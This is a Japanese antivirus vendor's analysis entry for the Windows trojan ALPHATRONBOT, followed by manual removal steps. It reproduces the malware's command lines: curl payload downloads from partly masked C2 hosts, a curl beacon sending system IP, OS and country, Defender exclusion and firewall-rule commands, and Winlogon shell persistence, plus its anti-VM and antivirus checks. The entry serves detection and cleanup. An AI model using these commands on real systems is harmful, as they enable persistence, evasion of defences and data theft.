Trojan.Win64.ALPHATRONBOT.A
Windows


マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
なし
感染報告の有無 :
はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
マルウェアは、特定のWebサイトにアクセスし、情報を送受信します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- %User Temp%\{8 Random Characters}.bat → deleted afterwards
- %User Temp%\qb{Random Characters}.{2 Random Characters}\cnf → deleted afterwards
- %User Temp%\cnf → deleted afterwards
- %User Temp%\log01.log
- %system%\curl.exe → if not existing
- %User Temp\v.7z → deleted afterwards
- %User Temp\v.bat → deleted afterwards
- %User Temp%\NetFramework.4.8.7z → deleted afterwards
- %AppDataLocal%\google\chrome\user data\{Benign Component Files}
- %AppDataLocal%\google\chrome\user data\Windows Driver Foundation (WDF).exe → ALPHATRONBOT malware
- %AppDataLocal%\google\chrome\user data\wzone.exe
- %AppDataLocal%\google\chrome\user data\r01.txt → file attribute set to Hidden and System, deleted afterwards
- %User Temp%\NetFramework.3.5.7z → deleted afterwards
- %AppDataLocal%\google\chrome\user data\VC_redist.x86.exe
- %AppDataLocal%\google\chrome\user data\wtime.cmd
- %AppDataLocal%\google\chrome\user data\com.information.googlegmail.ini → copied to %AppDataLocal%\googledrive\googleemail\com.information.googlegmail.ini
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。)
マルウェアは、以下のプロセスを追加します。
- cmd.exe /c ""%User Temp%\{8 Random Characters}.bat" "{Malware File Path}\{Malware File Name}"
- %System%\cmd.exe /c wmic path win32_LocalTime Get Day,Month,Year /value
- wmic path win32_LocalTime Get Day,Month,Year /value
- %System%\cmd.exe /c tasklisti "imagename eq SbieSvc.exe"o csv /nh
- tasklist i "imagename eq SbieSvc.exe"o csv /nh
- reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Alu" /s /reg:32
- reg Add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Alu" /reg:32
- %System%\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation /v SystemProductName"
- reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation /v SystemProductName"
- %System%\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current /v SystemProductName"
- reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current /v SystemProductName"
- %System%\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current /v SystemManufacturer"
- reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current /v SystemManufacturer"
- curl https://ipinfo.io/ip -k
- curl https://ipinfo.io/country -k
- %System%\cmd.exe /c wmic os get caption
- wmic os get caption
- curl https://{Predetermined Domain}.com/parking/drive.php --user-agent "ubertax" -k
- curl https://{Predetermined Domain}.com/parking/uber.php
- curl -k https://c.{Domain from C2 Server}.com/c01.php --user-agent "c010101"
- %User Temp\v.bat
- find /i "TTL="
- powershell add-mppreference -exclusionprocess '%AppDataLocal%\google\chrome\user data\wzone.exe'
- powershell add-mppreference -exclusionpath '%AppDataLocal%\google\chrome\user data\wzone.exe'
- powershell add-mppreference -exclusionprocess '%AppDataLocal%\google\chrome\user data\windows driver foundation (wdf).exe'
- powershell add-mppreference -exclusionpath '%AppDataLocal%\google\chrome\user data\windows driver foundation (wdf).exe'
- netsh advfirewall firewall add rule name="windows defender" dir=in action=allow program="%AppDataLocal%\google\chrome\user data\windows driver foundation (wdf).exe
- curl -k -o "%User Temp%\NetFramework.4.8.7z" -L -C - "https://z.{BLOCKED}ara.com/v/NetFramework.4.8.7z" --user-agent "cndrvpn201" --retry 3
- %AppDataLocal%\google\chrome\user data\wzone.exe "%AppDataLocal%\google\chrome\user data\wtime.cmd" wlocale.cmd
- %AppDataLocal%\google\chrome\user data\wtime.cmd wlocale.cmd
- ping -n 3 127.0.0.1>nul
- powercfg /change standby-timeout-ac 0
- powercfg /change standby-timeout-dc 0
- reg add "HKLM\Software\Microsoft\Windows NT\Currentversion\Winlogon" /v shell /t reg_sz /d "explorer.exe, \"%AppDataLocal%\google\chrome\user data\wzone.exe\" \"%AppDataLocal%\google\chrome\user data\wtime.cmd\" wlocale.cmd" /f
- curl -k -L "https://z.{BLOCKED}ta.com/cu/cu_s.php?ip={System's External IP}&vos={System's Windows Version}&cid={System's Country}&sid=rwinda&ip_id={Device ID}&s=1" --user-agent "cnfvp201"
- powershell remove-mppreference -exclusionprocess '%Windows%\wudf.exe'
- powershell remove-mppreference -exclusionpath '%Windows%\wudf.exe'
- curl -k -o "%User Temp%\NetFramework3.5.7z" -L -C - "https://z.{BLOCKED}ta.com/v/NetFramework3.5.7z" --user-agent "cnfvp201" --retry 3
- ping -n 10 127.0.0.1 >nul
- ping -n 5 127.0.0.1 >nul
- %AppDataLocal%\google\chrome\user data\VC_redist.x86.exe
- %AppDataLocal%\google\chrome\user data\Windows Driver Foundation (WDF).exe
マルウェアは、以下のフォルダを作成します。
- %User Temp%\qb{Random Characters}.{2 Random Characters} → deleted afterwards
- %AppDataLocal%\google\chrome\user data → if not existing
- %AppDataLocal%\GoogleDrive\GoogleEmail → file attribute set to Hidden and System
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。)
自動実行方法
マルウェアは、自身のコピーがWindows起動時に自動実行されるよう以下のレジストリ値を変更します。
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows NT\Currentversion\Winlogon
shell = "explorer.exe, "%AppDataLocal%\google\chrome\user data\wzone.exe" "%AppDataLocal%\google\chrome\user data\wtime.cmd\" wlocale.cmd
他のシステム変更
マルウェアは、以下のファイルを削除します。
- %Windows%\WinRar.7z
- %Windows%\72201.exe
- %Windows%\wudf.exe
- %AppDataLocal%\google\chrome\user data\com.information.googlegmail.ini
- %Windows%\wudf.exe
(註:%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.. %AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。)
マルウェアは、インストールの過程で、以下のレジストリ値を追加します。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
Alu =
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
EnableLUA = 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
ConsentPromptBehaviorAdmin = 5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
PromptOnSecureDesktop = 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
ConsentPromptBehaviorUser = 3
プロセスの終了
マルウェアは、以下の不正プログラムに関連するプロセスを終了します。
- %AppDataLocal%\google\chrome\user data\Windows Driver Foundation (WDF).exe
(註:%AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。)
ダウンロード活動
マルウェアは、以下のWebサイトにアクセスして自身のコンポーネントファイルをダウンロードします。
- https://z.{Domain from C2 Server}.com/v.7z
- where Domain from C2 Server is the following as of this writing:
- {BLOCKED}ta
- https://{BLOCKED}.com/cloud1cybertron/wincurl/raw/main/curl.exe
- https://{BLOCKED}loud.net/cu/curl.exe → as of this writing, the said site is inaccessible
- https://z.{BLOCKED}ata.com/v/NetFramework.4.8.7z
- https://z.{BLOCKED}ta.com/v/NetFramework.3.5.7z
情報漏えい
マルウェアは、以下の情報を収集します。
- Product name
- System manufacturer
- System's country based on external IP address
- System's Windows version
- System's external IP address
その他
マルウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。
- https://ipinfo.io/ip
- https://ipinfo.io/country → country where external IP address is located
マルウェアは、以下のWebサイトにアクセスし、情報を送受信します。
- https://{Predetermined Domain}.com/parking/drive.php
- https://{Predetermined Domain}.com/parking/uber.php
- where Predetermined Domain can be:
- {BLOCKED}xi8858
- {BLOCKED}xi885868788
- {BLOCKED}5868888
- https://c{Domain from C2 Server}.com/c01.php
- where Domain from C2 Server is the following as of this writing:
- {BLOCKED}ta
- https://z.{BLOCKED}ta.com/cu/cu_s.php?ip={System's External IP}&vos={System's Windows Version}&cid={System's Country}&sid=rwinda&ip_id={Device ID}&s=1
マルウェアは、以下を実行します。
- It only proceeds with its behavior if %User Temp%\log01.log exists
- It does not proceed with its behavior if current system date is February 20 - 21 and current year ends with 24.
- It terminates itself if the following anti-sandbox and anti-vm routines are successful:
- Checking if SbieSvc.exe is running
- Idenitfying the product name through the registry and checking if it is one of the following:
- KVM
- VirtualBox
- Virtual Machine
- Identifying the system macnufacturer through registry and checking if it is the following:
- VMWare, Inc.
- It terminates itself if one the following antivirus processes is running on the system:
- ekrn.exe (ESET)
- QHActiveDefense.exe (Qihoo 360)
- avp.exe (Kaspersky)
- It terminates and deletes itself if the following conditions are met:
- %AppDataLocal%\google\chrome\user data\windows driver foundation (wdf).exe already exists
- The country code of affected system's external IP address is one of the following:
- IR (Iran)
- IQ (Iraq)
- AE (United Arab Emirates)
- MM (Myanmar)
- It sets the attributes of the following folders to Hidden and System if it exists:
- %AppDataLocal%\google
- %USERPROFILE%\.temp
- %AppDataLocal%\GoogleDrive\GoogleEmail
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。)
対応方法
手順 1
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
Windowsをセーフモードで再起動します。
手順 4
以下のファイルを検索し削除します。
- %User Temp%\{8 Random Characters}.bat
- %User Temp%\qb{Random Characters}.{2 Random Characters}\cnf
- %User Temp%\cnf
- %User Temp%\log01.log
- %system%\curl.exe
- %User Temp\v.7z
- %User Temp\v.bat
- %User Temp%\NetFramework.4.8.7z
- %AppDataLocal%\google\chrome\user data\{Benign Component Files}
- %AppDataLocal%\google\chrome\user data\Windows Driver Foundation (WDF).exe
- %AppDataLocal%\google\chrome\user data\wzone.exe
- %AppDataLocal%\google\chrome\user data\r01.txt
- %User Temp%\NetFramework.3.5.7z
- %AppDataLocal%\google\chrome\user data\VC_redist.x86.exe
- %AppDataLocal%\google\chrome\user data\wtime.cmd
- %AppDataLocal%\google\chrome\user data\com.information.googlegmail.ini
- %AppDataLocal%\googledrive\googleemail\com.information.googlegmail.ini
手順 5
以下のフォルダを検索し削除します。
- %User Temp%\qb{Random Characters}.{2 Random Characters}
- %AppDataLocal%\google\chrome\user data
- %AppDataLocal%\GoogleDrive\GoogleEmail
手順 6
変更されたレジストリ値を修正します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
事前に意図的に対象の設定を変更していた場合は、意図するオリジナルの設定に戻してください。変更する値が分からない場合は、システム管理者にお尋ねいただき、レジストリの編集はお客様の責任として行なって頂くようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\Currentversion\Winlogon
- From: shell = "explorer.exe, "%AppDataLocal%\google\chrome\user data\wzone.exe" "%AppDataLocal%\google\chrome\user data\wtime.cmd\" wlocale.cmd
- To: shell = "explorer.exe"
手順 7
このレジストリ値を削除します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
- Alu
- Alu
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- EnableLUA
- EnableLUA
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- ConsentPromptBehaviorAdmin
- ConsentPromptBehaviorAdmin
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- PromptOnSecureDesktop
- PromptOnSecureDesktop
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- ConsentPromptBehaviorUser
- ConsentPromptBehaviorUser
手順 8
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「Trojan.Win64.ALPHATRONBOT.A」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください

